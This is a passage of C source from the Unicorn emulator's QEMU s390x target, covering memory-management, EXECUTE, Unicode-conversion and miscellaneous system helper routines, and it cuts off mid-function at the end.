/ TARGET_PAGE_SIZE, 1, &key)) { return 0; } re = key & (SK_R | SK_C); key &= ~SK_R; if (skeyclass->set_skeys(ss, r2 / TARGET_PAGE_SIZE, 1, &key)) { return 0; } /* * As we can only flush by virtual address and not all the entries * that point to a physical address we have to flush the whole TLB. 
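   (Illustrative aside, not part of the original file: assuming the
   reference bit is 0x04 and the change bit is 0x02 - stand-ins for
   SK_R/SK_C used only in this sketch - the cc returned below is simply
   both bits shifted down by one.) */
static int rrbe_cc_sketch(uint8_t key)
{
    int re = key & (0x04 | 0x02); /* extract reference and change bits */

    return re >> 1;               /* cc in 0..3, see the table below */
}
/* (End of aside.)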
*/ tlb_flush_all_cpus_synced(env_cpu(env)); /* * cc * * 0 Reference bit zero; change bit zero * 1 Reference bit zero; change bit one * 2 Reference bit one; change bit zero * 3 Reference bit one; change bit one */ return re >> 1; } uint32_t HELPER(mvcs)(CPUS390XState *env, uint64_t l, uint64_t a1, uint64_t a2) { const uint8_t psw_as = (env->psw.mask & PSW_MASK_ASC) >> PSW_SHIFT_ASC; S390Access srca, desta; uintptr_t ra = GETPC(); int cc = 0; HELPER_LOG("%s: %16" PRIx64 " %16" PRIx64 " %16" PRIx64 "\n", __func__, l, a1, a2); if (!(env->psw.mask & PSW_MASK_DAT) || !(env->cregs[0] & CR0_SECONDARY) || psw_as == AS_HOME || psw_as == AS_ACCREG) { s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } l = wrap_length32(env, l); if (l > 256) { /* max 256 */ l = 256; cc = 3; } else if (!l) { return cc; } /* TODO: Access key handling */ srca = access_prepare(env, a2, l, MMU_DATA_LOAD, MMU_PRIMARY_IDX, ra); desta = access_prepare(env, a1, l, MMU_DATA_STORE, MMU_SECONDARY_IDX, ra); access_memmove(env, &desta, &srca, ra); return cc; } uint32_t HELPER(mvcp)(CPUS390XState *env, uint64_t l, uint64_t a1, uint64_t a2) { const uint8_t psw_as = (env->psw.mask & PSW_MASK_ASC) >> PSW_SHIFT_ASC; S390Access srca, desta; uintptr_t ra = GETPC(); int cc = 0; HELPER_LOG("%s: %16" PRIx64 " %16" PRIx64 " %16" PRIx64 "\n", __func__, l, a1, a2); if (!(env->psw.mask & PSW_MASK_DAT) || !(env->cregs[0] & CR0_SECONDARY) || psw_as == AS_HOME || psw_as == AS_ACCREG) { s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } l = wrap_length32(env, l); if (l > 256) { /* max 256 */ l = 256; cc = 3; } else if (!l) { return cc; } /* TODO: Access key handling */ srca = access_prepare(env, a2, l, MMU_DATA_LOAD, MMU_SECONDARY_IDX, ra); desta = access_prepare(env, a1, l, MMU_DATA_STORE, MMU_PRIMARY_IDX, ra); access_memmove(env, &desta, &srca, ra); return cc; } void HELPER(idte)(CPUS390XState *env, uint64_t r1, uint64_t r2, uint32_t m4) { CPUState *cs = env_cpu(env); const uintptr_t ra = GETPC(); uint64_t table, entry, raddr; uint16_t entries, i, index = 0; if (r2 & 0xff000) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } if (!(r2 & 0x800)) { /* invalidation-and-clearing operation */ table = r1 & ASCE_ORIGIN; entries = (r2 & 0x7ff) + 1; switch (r1 & ASCE_TYPE_MASK) { case ASCE_TYPE_REGION1: index = (r2 >> 53) & 0x7ff; break; case ASCE_TYPE_REGION2: index = (r2 >> 42) & 0x7ff; break; case ASCE_TYPE_REGION3: index = (r2 >> 31) & 0x7ff; break; case ASCE_TYPE_SEGMENT: index = (r2 >> 20) & 0x7ff; break; } for (i = 0; i < entries; i++) { /* addresses are not wrapped in 24/31bit mode but table index is */ raddr = table + ((index + i) & 0x7ff) * sizeof(entry); entry = cpu_ldq_mmuidx_ra(env, raddr, MMU_REAL_IDX, ra); if (!(entry & REGION_ENTRY_I)) { /* we are allowed to not store if already invalid */ entry |= REGION_ENTRY_I; cpu_stq_mmuidx_ra(env, raddr, entry, MMU_REAL_IDX, ra); } } } /* We simply flush the complete tlb, therefore we can ignore r3. 
*/ if (m4 & 1) { tlb_flush(cs); } else { tlb_flush_all_cpus_synced(cs); } } /* invalidate pte */ void HELPER(ipte)(CPUS390XState *env, uint64_t pto, uint64_t vaddr, uint32_t m4) { CPUState *cs = env_cpu(env); const uintptr_t ra = GETPC(); uint64_t page = vaddr & TARGET_PAGE_MASK; uint64_t pte_addr, pte; /* Compute the page table entry address */ pte_addr = (pto & SEGMENT_ENTRY_ORIGIN); pte_addr += VADDR_PAGE_TX(vaddr) * 8; /* Mark the page table entry as invalid */ pte = cpu_ldq_mmuidx_ra(env, pte_addr, MMU_REAL_IDX, ra); pte |= PAGE_ENTRY_I; cpu_stq_mmuidx_ra(env, pte_addr, pte, MMU_REAL_IDX, ra); /* XXX we exploit the fact that Linux passes the exact virtual address here - it's not obliged to! */ if (m4 & 1) { if (vaddr & ~VADDR_PAGE_TX_MASK) { tlb_flush_page(cs, page); /* XXX 31-bit hack */ tlb_flush_page(cs, page ^ 0x80000000); } else { /* looks like we don't have a valid virtual address */ tlb_flush(cs); } } else { if (vaddr & ~VADDR_PAGE_TX_MASK) { tlb_flush_page_all_cpus_synced(cs, page); /* XXX 31-bit hack */ tlb_flush_page_all_cpus_synced(cs, page ^ 0x80000000); } else { /* looks like we don't have a valid virtual address */ tlb_flush_all_cpus_synced(cs); } } } /* flush local tlb */ void HELPER(ptlb)(CPUS390XState *env) { tlb_flush(env_cpu(env)); } /* flush global tlb */ void HELPER(purge)(CPUS390XState *env) { tlb_flush_all_cpus_synced(env_cpu(env)); } /* load real address */ uint64_t HELPER(lra)(CPUS390XState *env, uint64_t addr) { uint64_t asc = env->psw.mask & PSW_MASK_ASC; uint64_t ret, tec; int flags, exc, cc; /* XXX incomplete - has more corner cases */ if (!(env->psw.mask & PSW_MASK_64) && (addr >> 32)) { tcg_s390_program_interrupt(env, PGM_SPECIAL_OP, GETPC()); } exc = mmu_translate(env, addr, 0, asc, &ret, &flags, &tec); if (exc) { cc = 3; ret = exc | 0x80000000; } else { cc = 0; ret |= addr & ~TARGET_PAGE_MASK; } env->cc_op = cc; return ret; } /* load pair from quadword */ uint64_t HELPER(lpq)(CPUS390XState *env, uint64_t addr) { uintptr_t ra = GETPC(); uint64_t hi, lo; check_alignment(env, addr, 16, ra); hi = cpu_ldq_data_ra(env, addr + 0, ra); lo = cpu_ldq_data_ra(env, addr + 8, ra); env->retxl = lo; return hi; } uint64_t HELPER(lpq_parallel)(CPUS390XState *env, uint64_t addr) { uintptr_t ra = GETPC(); uint64_t hi, lo; int mem_idx; TCGMemOpIdx oi; Int128 v; assert(HAVE_ATOMIC128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); v = helper_atomic_ldo_be_mmu(env, addr, oi, ra); hi = int128_gethi(v); lo = int128_getlo(v); env->retxl = lo; return hi; } /* store pair to quadword */ void HELPER(stpq)(CPUS390XState *env, uint64_t addr, uint64_t low, uint64_t high) { uintptr_t ra = GETPC(); check_alignment(env, addr, 16, ra); cpu_stq_data_ra(env, addr + 0, high, ra); cpu_stq_data_ra(env, addr + 8, low, ra); } void HELPER(stpq_parallel)(CPUS390XState *env, uint64_t addr, uint64_t low, uint64_t high) { uintptr_t ra = GETPC(); int mem_idx; TCGMemOpIdx oi; Int128 v; assert(HAVE_ATOMIC128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); v = int128_make128(low, high); helper_atomic_sto_be_mmu(env, addr, v, oi, ra); } /* Execute instruction. This instruction executes an insn modified with the contents of r1. It does not change the executed instruction in memory; it does not change the program counter. Perform this by recording the modified instruction in env->ex_value. This will be noticed by cpu_get_tb_cpu_state and thus tb translation. 
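   (Illustrative aside, not part of the original file: the core of
   EXECUTE is OR-ing bits 56-63 of R1 into the second byte of the target
   instruction; "ex_patch" is a hypothetical rendering for the first
   halfword.) */
static uint16_t ex_patch(uint16_t first_halfword, uint8_t r1_low)
{
    /* for SS-format insns such as MVC the second byte is the length */
    return first_halfword | r1_low;
}
/* E.g. executing MVC (first halfword 0xd200) with r1_low == 0x0f gives
   0xd20f, i.e. a 16-byte move, since SS lengths are encoded minus one.
   (End of aside.)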
*/ void HELPER(ex)(CPUS390XState *env, uint32_t ilen, uint64_t r1, uint64_t addr) { uint64_t insn = cpu_lduw_code(env, addr); uint8_t opc = insn >> 8; /* Or in the contents of R1[56:63]. */ insn |= r1 & 0xff; /* Load the rest of the instruction. */ insn <<= 48; switch (get_ilen(opc)) { case 2: break; case 4: insn |= (uint64_t)cpu_lduw_code(env, addr + 2) << 32; break; case 6: insn |= (uint64_t)(uint32_t)cpu_ldl_code(env, addr + 2) << 16; break; default: g_assert_not_reached(); } /* The very most common cases can be sped up by avoiding a new TB. */ if ((opc & 0xf0) == 0xd0) { typedef uint32_t (*dx_helper)(CPUS390XState *, uint32_t, uint64_t, uint64_t, uintptr_t); static const dx_helper dx[16] = { [0x0] = do_helper_trt_bkwd, [0x2] = do_helper_mvc, [0x4] = do_helper_nc, [0x5] = do_helper_clc, [0x6] = do_helper_oc, [0x7] = do_helper_xc, [0xc] = do_helper_tr, [0xd] = do_helper_trt_fwd, }; dx_helper helper = dx[opc & 0xf]; if (helper) { uint32_t l = extract64(insn, 48, 8); uint32_t b1 = extract64(insn, 44, 4); uint32_t d1 = extract64(insn, 32, 12); uint32_t b2 = extract64(insn, 28, 4); uint32_t d2 = extract64(insn, 16, 12); uint64_t a1 = wrap_address(env, env->regs[b1] + d1); uint64_t a2 = wrap_address(env, env->regs[b2] + d2); env->cc_op = helper(env, l, a1, a2, 0); env->psw.addr += ilen; return; } } else if (opc == 0x0a) { env->int_svc_code = extract64(insn, 48, 8); env->int_svc_ilen = ilen; helper_exception(env, EXCP_SVC); g_assert_not_reached(); } /* Record the insn we want to execute as well as the ilen to use during the execution of the target insn. This will also ensure that ex_value is non-zero, which flags that we are in a state that requires such execution. */ env->ex_value = insn | ilen; } uint32_t HELPER(mvcos)(CPUS390XState *env, uint64_t dest, uint64_t src, uint64_t len) { const uint8_t psw_key = (env->psw.mask & PSW_MASK_KEY) >> PSW_SHIFT_KEY; const uint8_t psw_as = (env->psw.mask & PSW_MASK_ASC) >> PSW_SHIFT_ASC; const uint64_t r0 = env->regs[0]; const uintptr_t ra = GETPC(); uint8_t dest_key, dest_as, dest_k, dest_a; uint8_t src_key, src_as, src_k, src_a; uint64_t val; int cc = 0; HELPER_LOG("%s dest %" PRIx64 ", src %" PRIx64 ", len %" PRIx64 "\n", __func__, dest, src, len); if (!(env->psw.mask & PSW_MASK_DAT)) { tcg_s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } /* OAC (operand access control) for the first operand -> dest */ val = (r0 & 0xffff0000ULL) >> 16; dest_key = (val >> 12) & 0xf; dest_as = (val >> 6) & 0x3; dest_k = (val >> 1) & 0x1; dest_a = val & 0x1; /* OAC (operand access control) for the second operand -> src */ val = (r0 & 0x0000ffffULL); src_key = (val >> 12) & 0xf; src_as = (val >> 6) & 0x3; src_k = (val >> 1) & 0x1; src_a = val & 0x1; if (!dest_k) { dest_key = psw_key; } if (!src_k) { src_key = psw_key; } if (!dest_a) { dest_as = psw_as; } if (!src_a) { src_as = psw_as; } if (dest_a && dest_as == AS_HOME && (env->psw.mask & PSW_MASK_PSTATE)) { tcg_s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } if (!(env->cregs[0] & CR0_SECONDARY) && (dest_as == AS_SECONDARY || src_as == AS_SECONDARY)) { tcg_s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } if (!psw_key_valid(env, dest_key) || !psw_key_valid(env, src_key)) { tcg_s390_program_interrupt(env, PGM_PRIVILEGED, ra); } len = wrap_length32(env, len); if (len > 4096) { cc = 3; len = 4096; } /* FIXME: AR-mode and proper problem state mode (using PSW keys) missing */ if (src_as == AS_ACCREG || dest_as == AS_ACCREG || (env->psw.mask & PSW_MASK_PSTATE)) { qemu_log_mask(LOG_UNIMP, "%s: AR-mode and PSTATE support 
missing\n", __func__); tcg_s390_program_interrupt(env, PGM_ADDRESSING, ra); } /* FIXME: Access using correct keys and AR-mode */ if (len) { S390Access srca = access_prepare(env, src, len, MMU_DATA_LOAD, mmu_idx_from_as(src_as), ra); S390Access desta = access_prepare(env, dest, len, MMU_DATA_STORE, mmu_idx_from_as(dest_as), ra); access_memmove(env, &desta, &srca, ra); } return cc; } /* Decode a Unicode character. A return value < 0 indicates success, storing the UTF-32 result into OCHAR and the input length into OLEN. A return value >= 0 indicates failure, and the CC value to be returned. */ typedef int (*decode_unicode_fn)(CPUS390XState *env, uint64_t addr, uint64_t ilen, bool enh_check, uintptr_t ra, uint32_t *ochar, uint32_t *olen); /* Encode a Unicode character. A return value < 0 indicates success, storing the bytes into ADDR and the output length into OLEN. A return value >= 0 indicates failure, and the CC value to be returned. */ typedef int (*encode_unicode_fn)(CPUS390XState *env, uint64_t addr, uint64_t ilen, uintptr_t ra, uint32_t c, uint32_t *olen); static int decode_utf8(CPUS390XState *env, uint64_t addr, uint64_t ilen, bool enh_check, uintptr_t ra, uint32_t *ochar, uint32_t *olen) { uint8_t s0, s1, s2, s3; uint32_t c, l; if (ilen < 1) { return 0; } s0 = cpu_ldub_data_ra(env, addr, ra); if (s0 <= 0x7f) { /* one byte character */ l = 1; c = s0; } else if (s0 <= (enh_check ? 0xc1 : 0xbf)) { /* invalid character */ return 2; } else if (s0 <= 0xdf) { /* two byte character */ l = 2; if (ilen < 2) { return 0; } s1 = cpu_ldub_data_ra(env, addr + 1, ra); c = s0 & 0x1f; c = (c << 6) | (s1 & 0x3f); if (enh_check && (s1 & 0xc0) != 0x80) { return 2; } } else if (s0 <= 0xef) { /* three byte character */ l = 3; if (ilen < 3) { return 0; } s1 = cpu_ldub_data_ra(env, addr + 1, ra); s2 = cpu_ldub_data_ra(env, addr + 2, ra); c = s0 & 0x0f; c = (c << 6) | (s1 & 0x3f); c = (c << 6) | (s2 & 0x3f); /* Fold the byte-by-byte range descriptions in the PoO into tests against the complete value. It disallows encodings that could be smaller, and the UTF-16 surrogates. */ if (enh_check && ((s1 & 0xc0) != 0x80 || (s2 & 0xc0) != 0x80 || c < 0x1000 || (c >= 0xd800 && c <= 0xdfff))) { return 2; } } else if (s0 <= (enh_check ? 0xf4 : 0xf7)) { /* four byte character */ l = 4; if (ilen < 4) { return 0; } s1 = cpu_ldub_data_ra(env, addr + 1, ra); s2 = cpu_ldub_data_ra(env, addr + 2, ra); s3 = cpu_ldub_data_ra(env, addr + 3, ra); c = s0 & 0x07; c = (c << 6) | (s1 & 0x3f); c = (c << 6) | (s2 & 0x3f); c = (c << 6) | (s3 & 0x3f); /* See above. 
*/ if (enh_check && ((s1 & 0xc0) != 0x80 || (s2 & 0xc0) != 0x80 || (s3 & 0xc0) != 0x80 || c < 0x010000 || c > 0x10ffff)) { return 2; } } else { /* invalid character */ return 2; } *ochar = c; *olen = l; return -1; } static int decode_utf16(CPUS390XState *env, uint64_t addr, uint64_t ilen, bool enh_check, uintptr_t ra, uint32_t *ochar, uint32_t *olen) { uint16_t s0, s1; uint32_t c, l; if (ilen < 2) { return 0; } s0 = cpu_lduw_data_ra(env, addr, ra); if ((s0 & 0xfc00) != 0xd800) { /* one word character */ l = 2; c = s0; } else { /* two word character */ l = 4; if (ilen < 4) { return 0; } s1 = cpu_lduw_data_ra(env, addr + 2, ra); c = extract32(s0, 6, 4) + 1; c = (c << 6) | (s0 & 0x3f); c = (c << 10) | (s1 & 0x3ff); if (enh_check && (s1 & 0xfc00) != 0xdc00) { /* invalid surrogate character */ return 2; } } *ochar = c; *olen = l; return -1; } static int decode_utf32(CPUS390XState *env, uint64_t addr, uint64_t ilen, bool enh_check, uintptr_t ra, uint32_t *ochar, uint32_t *olen) { uint32_t c; if (ilen < 4) { return 0; } c = cpu_ldl_data_ra(env, addr, ra); if ((c >= 0xd800 && c <= 0xdbff) || c > 0x10ffff) { /* invalid unicode character */ return 2; } *ochar = c; *olen = 4; return -1; } static int encode_utf8(CPUS390XState *env, uint64_t addr, uint64_t ilen, uintptr_t ra, uint32_t c, uint32_t *olen) { uint8_t d[4]; uint32_t l, i; if (c <= 0x7f) { /* one byte character */ l = 1; d[0] = c; } else if (c <= 0x7ff) { /* two byte character */ l = 2; d[1] = 0x80 | extract32(c, 0, 6); d[0] = 0xc0 | extract32(c, 6, 5); } else if (c <= 0xffff) { /* three byte character */ l = 3; d[2] = 0x80 | extract32(c, 0, 6); d[1] = 0x80 | extract32(c, 6, 6); d[0] = 0xe0 | extract32(c, 12, 4); } else { /* four byte character */ l = 4; d[3] = 0x80 | extract32(c, 0, 6); d[2] = 0x80 | extract32(c, 6, 6); d[1] = 0x80 | extract32(c, 12, 6); d[0] = 0xf0 | extract32(c, 18, 3); } if (ilen < l) { return 1; } for (i = 0; i < l; ++i) { cpu_stb_data_ra(env, addr + i, d[i], ra); } *olen = l; return -1; } static int encode_utf16(CPUS390XState *env, uint64_t addr, uint64_t ilen, uintptr_t ra, uint32_t c, uint32_t *olen) { uint16_t d0, d1; if (c <= 0xffff) { /* one word character */ if (ilen < 2) { return 1; } cpu_stw_data_ra(env, addr, c, ra); *olen = 2; } else { /* two word character */ if (ilen < 4) { return 1; } d1 = 0xdc00 | extract32(c, 0, 10); d0 = 0xd800 | extract32(c, 10, 6); d0 = deposit32(d0, 6, 4, extract32(c, 16, 5) - 1); cpu_stw_data_ra(env, addr + 0, d0, ra); cpu_stw_data_ra(env, addr + 2, d1, ra); *olen = 4; } return -1; } static int encode_utf32(CPUS390XState *env, uint64_t addr, uint64_t ilen, uintptr_t ra, uint32_t c, uint32_t *olen) { if (ilen < 4) { return 1; } cpu_stl_data_ra(env, addr, c, ra); *olen = 4; return -1; } static inline uint32_t convert_unicode(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3, uintptr_t ra, decode_unicode_fn decode, encode_unicode_fn encode) { uint64_t dst = get_address(env, r1); uint64_t dlen = get_length(env, r1 + 1); uint64_t src = get_address(env, r2); uint64_t slen = get_length(env, r2 + 1); bool enh_check = m3 & 1; int cc, i; /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 256. 
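Stopping early is architecturally fine: we return cc = 3 with the
       registers already advanced past the converted prefix, and the guest
       is expected to re-execute the instruction to pick up where we left
       off.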
*/ for (i = 0; i < 256; ++i) { uint32_t c, ilen, olen; cc = decode(env, src, slen, enh_check, ra, &c, &ilen); if (unlikely(cc >= 0)) { break; } cc = encode(env, dst, dlen, ra, c, &olen); if (unlikely(cc >= 0)) { break; } src += ilen; slen -= ilen; dst += olen; dlen -= olen; cc = 3; } set_address(env, r1, dst); set_length(env, r1 + 1, dlen); set_address(env, r2, src); set_length(env, r2 + 1, slen); return cc; } uint32_t HELPER(cu12)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf8, encode_utf16); } uint32_t HELPER(cu14)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf8, encode_utf32); } uint32_t HELPER(cu21)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf16, encode_utf8); } uint32_t HELPER(cu24)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf16, encode_utf32); } uint32_t HELPER(cu41)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf32, encode_utf8); } uint32_t HELPER(cu42)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf32, encode_utf16); } void probe_write_access(CPUS390XState *env, uint64_t addr, uint64_t len, uintptr_t ra) { /* test the actual access, not just any access to the page due to LAP */ while (len) { const uint64_t pagelen = -(addr | TARGET_PAGE_MASK); const uint64_t curlen = MIN(pagelen, len); probe_write(env, addr, curlen, cpu_mmu_index(env, false), ra); addr = wrap_address(env, addr + curlen); len -= curlen; } } void HELPER(probe_write_access)(CPUS390XState *env, uint64_t addr, uint64_t len) { probe_write_access(env, addr, len, GETPC()); } ���������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/misc_helper.c�������������������������������������������������������0000664�0000000�0000000�00000053475�14675241067�0021003�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 misc helper routines * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2009 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/memory.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "qemu/timer.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "tcg_s390x.h" #include "s390-tod.h" #include "sysemu/cpus.h" #include "sysemu/sysemu.h" #include "hw/s390x/ebcdic.h" //#include "hw/s390x/sclp.h" //#include "hw/s390x/s390_flic.h" #include "hw/s390x/ioinst.h" //#include "hw/s390x/s390-pci-inst.h" //#include "hw/s390x/tod.h" /* #define DEBUG_HELPER */ #ifdef DEBUG_HELPER #define HELPER_LOG(x, ...) qemu_log(x) #else #define HELPER_LOG(x, ...) #endif /* Raise an exception statically from a TB. */ void HELPER(exception)(CPUS390XState *env, uint32_t excp) { CPUState *cs = env_cpu(env); HELPER_LOG("%s: exception %d\n", __func__, excp); cs->exception_index = excp; cpu_loop_exit(cs); } /* Store CPU Timer (also used for EXTRACT CPU TIME) */ uint64_t HELPER(stpt)(CPUS390XState *env) { return time2tod(env->cputm - qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL)); } /* Store Clock */ uint64_t HELPER(stck)(CPUS390XState *env) { #if 0 S390TODState *td = s390_get_todstate(); S390TODClass *tdc = S390_TOD_GET_CLASS(td); S390TOD tod; tdc->get(td, &tod, &error_abort); return tod.low; #endif return 0; } /* SCLP service call */ uint32_t HELPER(servc)(CPUS390XState *env, uint64_t r1, uint64_t r2) { #if 0 qemu_mutex_lock_iothread(); int r = sclp_service_call(env, r1, r2); qemu_mutex_unlock_iothread(); if (r < 0) { tcg_s390_program_interrupt(env, -r, GETPC()); } return r; #endif return 0; } void HELPER(diag)(CPUS390XState *env, uint32_t r1, uint32_t r3, uint32_t num) { #if 0 uint64_t r; switch (num) { case 0x500: /* KVM hypercall */ qemu_mutex_lock_iothread(); r = s390_virtio_hypercall(env); qemu_mutex_unlock_iothread(); break; case 0x44: /* yield */ r = 0; break; case 0x308: /* ipl */ qemu_mutex_lock_iothread(); handle_diag_308(env, r1, r3, GETPC()); qemu_mutex_unlock_iothread(); r = 0; break; case 0x288: /* time bomb (watchdog) */ r = handle_diag_288(env, r1, r3); break; default: r = -1; break; } if (r) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } #endif } /* Set Prefix */ void HELPER(spx)(CPUS390XState *env, uint64_t a1) { CPUState *cs = env_cpu(env); uint32_t prefix = a1 & 0x7fffe000; env->psa = prefix; HELPER_LOG("prefix: %#x\n", prefix); tlb_flush_page(cs, 0); tlb_flush_page(cs, TARGET_PAGE_SIZE); } static void update_ckc_timer(CPUS390XState *env) { #if 0 S390TODState *td = s390_get_todstate(); uint64_t time; /* stop the timer and remove pending CKC IRQs */ timer_del(env->tod_timer); g_assert(qemu_mutex_iothread_locked()); env->pending_int &= ~INTERRUPT_EXT_CLOCK_COMPARATOR; /* the tod has to exceed the ckc, this can never happen if ckc is all 1's */ if (env->ckc == -1ULL) { return; } /* difference between origins */ time = env->ckc - td->base.low; /* nanoseconds */ time = tod2time(time); timer_mod(env->tod_timer, time); #endif } /* Set Clock Comparator */ void HELPER(sckc)(CPUS390XState *env, uint64_t ckc) { #if 0 env->ckc = ckc; qemu_mutex_lock_iothread(); update_ckc_timer(env); qemu_mutex_unlock_iothread(); #endif } void tcg_s390_tod_updated(CPUState *cs, run_on_cpu_data opaque) { S390CPU *cpu = S390_CPU(cs); update_ckc_timer(&cpu->env); } /* Set Clock */ uint32_t HELPER(sck)(CPUS390XState *env, uint64_t tod_low) { #if 0 S390TODState *td = s390_get_todstate(); S390TODClass *tdc = S390_TOD_GET_CLASS(td); S390TOD tod = { .high = 0, .low = tod_low, }; qemu_mutex_lock_iothread(); tdc->set(td, &tod, &error_abort); 
qemu_mutex_unlock_iothread(); #endif return 0; } /* Set Tod Programmable Field */ void HELPER(sckpf)(CPUS390XState *env, uint64_t r0) { uint32_t val = r0; if (val & 0xffff0000) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } env->todpr = val; } /* Store Clock Comparator */ uint64_t HELPER(stckc)(CPUS390XState *env) { return env->ckc; } /* Set CPU Timer */ void HELPER(spt)(CPUS390XState *env, uint64_t time) { if (time == -1ULL) { return; } /* nanoseconds */ time = tod2time(time); env->cputm = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + time; // timer_mod(env->cpu_timer, env->cputm); } /* Store System Information */ uint32_t HELPER(stsi)(CPUS390XState *env, uint64_t a0, uint64_t r0, uint64_t r1) { #if 0 const uintptr_t ra = GETPC(); const uint32_t sel1 = r0 & STSI_R0_SEL1_MASK; const uint32_t sel2 = r1 & STSI_R1_SEL2_MASK; const MachineState *ms = MACHINE(qdev_get_machine()); uint16_t total_cpus = 0, conf_cpus = 0, reserved_cpus = 0; S390CPU *cpu = env_archcpu(env); SysIB sysib = { }; int i, cc = 0; if ((r0 & STSI_R0_FC_MASK) > STSI_R0_FC_LEVEL_3) { /* invalid function code: no other checks are performed */ return 3; } if ((r0 & STSI_R0_RESERVED_MASK) || (r1 & STSI_R1_RESERVED_MASK)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } if ((r0 & STSI_R0_FC_MASK) == STSI_R0_FC_CURRENT) { /* query the current level: no further checks are performed */ env->regs[0] = STSI_R0_FC_LEVEL_3; return 0; } if (a0 & ~TARGET_PAGE_MASK) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } /* count the cpus and split them into configured and reserved ones */ for (i = 0; i < ms->possible_cpus->len; i++) { total_cpus++; if (ms->possible_cpus->cpus[i].cpu) { conf_cpus++; } else { reserved_cpus++; } } /* * In theory, we could report Level 1 / Level 2 as current. However, * the Linux kernel will detect this as running under LPAR and assume * that we have a sclp linemode console (which is always present on * LPAR, but not the default for QEMU), therefore not displaying boot * messages and making booting a Linux kernel under TCG harder. * * For now we fake the same SMP configuration on all levels. * * TODO: We could later make the level configurable via the machine * and change defaults (linemode console) based on machine type * and accelerator. 
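*
     * As a worked (hypothetical) example of the decoding below: a query
     * with function code 3 and sel1 == 2, sel2 == 2 fills in the
     * SysIB 3.2.2 ("VM CPUs") block and copies it to the page-aligned
     * address in a0.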
*/ switch (r0 & STSI_R0_FC_MASK) { case STSI_R0_FC_LEVEL_1: if ((sel1 == 1) && (sel2 == 1)) { /* Basic Machine Configuration */ char type[5] = {}; ebcdic_put(sysib.sysib_111.manuf, "QEMU ", 16); /* same as machine type number in STORE CPU ID, but in EBCDIC */ snprintf(type, ARRAY_SIZE(type), "%X", cpu->model->def->type); ebcdic_put(sysib.sysib_111.type, type, 4); /* model number (not stored in STORE CPU ID for z/Architecure) */ ebcdic_put(sysib.sysib_111.model, "QEMU ", 16); ebcdic_put(sysib.sysib_111.sequence, "QEMU ", 16); ebcdic_put(sysib.sysib_111.plant, "QEMU", 4); } else if ((sel1 == 2) && (sel2 == 1)) { /* Basic Machine CPU */ ebcdic_put(sysib.sysib_121.sequence, "QEMUQEMUQEMUQEMU", 16); ebcdic_put(sysib.sysib_121.plant, "QEMU", 4); sysib.sysib_121.cpu_addr = cpu_to_be16(env->core_id); } else if ((sel1 == 2) && (sel2 == 2)) { /* Basic Machine CPUs */ sysib.sysib_122.capability = cpu_to_be32(0x443afc29); sysib.sysib_122.total_cpus = cpu_to_be16(total_cpus); sysib.sysib_122.conf_cpus = cpu_to_be16(conf_cpus); sysib.sysib_122.reserved_cpus = cpu_to_be16(reserved_cpus); } else { cc = 3; } break; case STSI_R0_FC_LEVEL_2: if ((sel1 == 2) && (sel2 == 1)) { /* LPAR CPU */ ebcdic_put(sysib.sysib_221.sequence, "QEMUQEMUQEMUQEMU", 16); ebcdic_put(sysib.sysib_221.plant, "QEMU", 4); sysib.sysib_221.cpu_addr = cpu_to_be16(env->core_id); } else if ((sel1 == 2) && (sel2 == 2)) { /* LPAR CPUs */ sysib.sysib_222.lcpuc = 0x80; /* dedicated */ sysib.sysib_222.total_cpus = cpu_to_be16(total_cpus); sysib.sysib_222.conf_cpus = cpu_to_be16(conf_cpus); sysib.sysib_222.reserved_cpus = cpu_to_be16(reserved_cpus); ebcdic_put(sysib.sysib_222.name, "QEMU ", 8); sysib.sysib_222.caf = cpu_to_be32(1000); sysib.sysib_222.dedicated_cpus = cpu_to_be16(conf_cpus); } else { cc = 3; } break; case STSI_R0_FC_LEVEL_3: if ((sel1 == 2) && (sel2 == 2)) { /* VM CPUs */ sysib.sysib_322.count = 1; sysib.sysib_322.vm[0].total_cpus = 